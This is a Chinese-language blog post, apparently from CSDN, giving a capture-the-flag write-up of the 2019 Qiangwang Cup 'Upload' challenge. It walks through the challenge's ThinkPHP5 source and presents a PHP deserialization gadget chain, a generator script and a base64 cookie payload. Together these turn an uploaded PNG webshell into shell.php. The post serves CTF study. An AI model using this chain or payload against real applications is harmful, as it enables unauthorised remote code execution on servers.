[强网杯 2019]Upload

于 2023-12-17 19:52:22 发布
阅读量155 收藏 1
点赞数
分类专栏: nssctf web 进阶 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/134964295
版权

[强网杯 2019]Upload

开放注册直接注册一个账号然后登录进去

先对页面进行简单文件上传测试发现都不存在漏洞对网站进行目录扫描

发现www.tar.gz

打开发现是tp5框架发现源码

这里如果前面信息收集的完整会发现存在反序列化

对注册,登录,上传文件页面分析

分析一下源码可以确定是反序列化

app\web\controller\Profile
 




   public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }


app\web\controller\Register
    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

魔术方法就这几个,继续分析寻找可以利用的漏洞

Register主要注册用户没有什么可以利用的地方

<?php
namespace app\web\controller;

use think\Controller;

class Profile extends Controller
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __construct()
    {   
        $this->checker=new Index();
        $this->upload_menu=md5($_SERVER['REMOTE_ADDR']);
        @chdir("../public/upload");
        if(!is_dir($this->upload_menu)){
            @mkdir($this->upload_menu);
        }
        @chdir($this->upload_menu);
    }

    public function upload_img(){
        if($this->checker){
            if(!$this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
                $this->redirect($curr_url,302);
                exit();
            }
        }

        if(!empty($_FILES)){
            $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
            $this->filename=md5($_FILES['upload_file']['name']).".png";
            $this->ext_check();
        }
        if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

    public function update_img(){
        $user_info=db('user')->where("ID",$this->checker->profile['ID'])->find();
        if(empty($user_info['img']) && $this->img){
            if(db('user')->where('ID',$user_info['ID'])->data(["img"=>addslashes($this->img)])->update()){
                $this->update_cookie();
                $this->success('Upload img successful!', url('../home'));
            }else{
                $this->error('Upload file failed!', url('../index'));
            }
        }
    }

    public function update_cookie(){
        $this->checker->profile['img']=$this->img;
        cookie("user",base64_encode(serialize($this->checker->profile)),3600);
    }

    public function ext_check(){
        $ext_arr=explode(".",$this->filename);
        $this->ext=end($ext_arr);
        if($this->ext=="png"){
            return 1;
        }else{
            return 0;
        }
    }

    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

在profile中会对上传上来的文件存放在临时目录并将传入的文件名通过md5加密返回新的文件名

通过ext_check判断后缀名是不是png,判断成功后把临时文件复制到目标目录下并删除临时目录

       if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

重点在于上面这一段会复制this->filename_tmp到this->filename,如果我们能控制this->filename_tmp为上传后的png木马文件同时控制this->filename为php后缀文件,这里没有对this->filename_tmp和this->filename的值做判断

思路从Register.php中的__destruct()

这里要设置registed的值为0会

$this->checker->index()

这里我们可以把checker的值设置new Profile那就会变成调用Profile类中的index方法

但是Profile中没有index方法就会触发call


    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

这里就会变成this->index但是没有index这个属性就会触发get


    public function __get($name)
    {
        return $this->except[$name];
    }

这里except的参数可控我们让他成为键值的方式,最总我们要构造成upload_img方法,键为传入的index值为upload_img那返回给call就是this->upload_img(),进入upload_img方法后我们要设置checker的值为0,当值为0经过if($this->checker)时不进行判断然后设置ext为1进行复制文件的操作

先上传文件,

得到上传后的目录

<?php
namespace app\web\controller;
class Profile{
    public $checker = 0 ;
    public $filename_tmp = "./upload/1ca3561b92a37e6a85619366d3586b6b/00bf23e130fa1e525e332ff03dae345d.png";
    public $filename = "./upload/shell.php";
    public $ext = 1 ;
    public $except = array("index"=>"upload_img");
    
}
class Register{
    public $checker;
    public $registed = 0;
}
$a = new Register();
$a->checker= new Profile();
echo base64_encode(serialize($a));

    
    
    
    
?>
TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo1OntzOjc6ImNoZWNrZXIiO2k6MDtzOjEyOiJmaWxlbmFtZV90bXAiO3M6Nzg6Ii4vdXBsb2FkLzFjYTM1NjFiOTJhMzdlNmE4NTYxOTM2NmQzNTg2YjZiLzAwYmYyM2UxMzBmYTFlNTI1ZTMzMmZmMDNkYWUzNDVkLnBuZyI7czo4OiJmaWxlbmFtZSI7czoxODoiLi91cGxvYWQvc2hlbGwucGhwIjtzOjM6ImV4dCI7aToxO3M6NjoiZXhjZXB0IjthOjE6e3M6NToiaW5kZXgiO3M6MTA6InVwbG9hZF9pbWciO319czo4OiJyZWdpc3RlZCI7aTowO30=

替换cookie访问修改过的页面

许允er
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【BUUCTF]极客大挑战 2019Upload1 write up
GZWZ_的博客
04-23 594
文件上传冲啊!!!!!!
upload2019.rar
06-25
upload-2019,该环境是用于练习文件上传漏洞的,通过该环境的练习能够使自己更加牢固的掌握文件上传的漏洞原理以及运用
2019 第三届强网杯线上赛部分web复现
weixin_30881367的博客
05-28 630
0x00前言 周末打了强网杯,队伍只做得出来6道签到题,web有三道我仔细研究了但是没有最终做出来,赛后有在群里看到其他师傅提供了writeup和环境复现的docker环境,于是跟着学习一波并记录下来 0x01 upload 第一步扫目录发现有备份文件 下载下来后大致浏览就清楚是thinkphp5框架,并且没有远程代码执行漏洞 根据题目的数据传输情况,可以发现在登录后有个us...
2017第二届广东省强网杯线上赛--Nonstandard
Hk_Mayfly的博客
11-07 279
测试文件:http://static2.ichunqiu.com/icq/resources/fileupload/CTF/echunqiu/qwb/Nonstandard_26195e1832795caa18fd4c7cfbd56600.zip 1.准备 获得信息: 32位文件 2.IDA打开 int __cdecl main(int argc, const char ...
[BUUCTF][强网杯 2019]Upload
cosmoslin的博客
01-22 1814
考点 代码审计 反序列化 解题 信息搜集 首先打开是一个登录框,尝试sql无果 注册登录,发现一个文件上传页面 先试试文件上传,会将jpg文件转换为png,文件名随机生成 dirsearch扫一下目录,有备份文件www.tar.gz 解压后是一个tp5的框架 代码审计 打开文件后有两个断点 application/web/controller/Index.php 在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查 application/web
强网杯 2019 Upload(代码审计、反序列化、thinkphp5,附代码审计详解)
2301_76690905的博客
11-12 124
首先看到登录和注册页面,爆破了一下admin登录界面无事发生,注册后登录看见一个上传头像的上传点(不知道是不是容器原因,上传完第一次后上传不了第二次一直显示连接不上),扫了下目录扫出一些文件,其中有用的是www.tar.gz打开压缩包能看见是th5,查看查看看到其定义的路由都指向了这个模块,该模块下共有四个控制器(四个文件的审计在最后)关键的点在于:Index.php中的login_check()中,有一处使用了反序列化,并且没有进行任何过滤寻找别的魔术方法Register.php中:Profile.php
强网杯-upload1
08-08
强网杯强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
安装upload-labs
10-22
安装upload-labs
upload file package
07-13
upload file package
upload插件
05-11
upload的扩展插件,直接用,很方便,如果需要这一插件的可以看一下。
upload上传实例
12-08
将此项目在eclipse中导入,然后进入\WebContent\publicity-1.0.0\demo.html即可看到效果
vux-upload:vux上传组件
05-14
vux-uploadvux-upload是一个vue的上传组件,是对组件库的一个补充,同时参考了开源的组件,添加了部分功能,然后进行开源。vux-upload实现的功能基于vux,适合vux项目增加了删除功能增加图片预览功能增加自定义...
upload.html
01-11
before-upload 上传文件之前的钩子,参数为上传的文件,若返回 false 或者返回 Promise 且被 reject,则停止上传 function(file) - - before-remove 删除文件之前的钩子,参数为上传的文件和文件列表,若返回 false...
aliyun-upload-sdk-1.5.0.zip
06-09
aliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-...
file-upload
02-01
文件上传,jQuery File Upload 是一个Jquery图片上传组件,支持多文件上传、取消、删除,上传前缩略图预览、列表显示图片大小,支持上传进度条显示;支持各种动态语言开发的服务器端。
反序列化(强网杯2019UPLOAD
kid的博客
05-29 5811
反序列化(强网杯2019UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
2019强网杯upload
m0_61448651的博客
07-21 616
2019强网杯upload
(BUUCTF)huxiangbei_2019_hacknote
最新发布
xy1458214551的博客
11-30 62
buuctf的huxiangbei_2019_hacknote
强网杯2019(高明的黑客&强网先锋上单)
kid的博客
05-30 5555
强网杯2019(高明的黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明的黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
el-upload before-upload
07-28
el-upload 是 Element UI 组件库中的一个上传组件,用于实现文件上传的功能。before-upload 是 el-upload 组件的一个属性,用于在上传文件之前对文件进行处理或验证。 在 el-upload 组件时,可以通过 before-upload...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值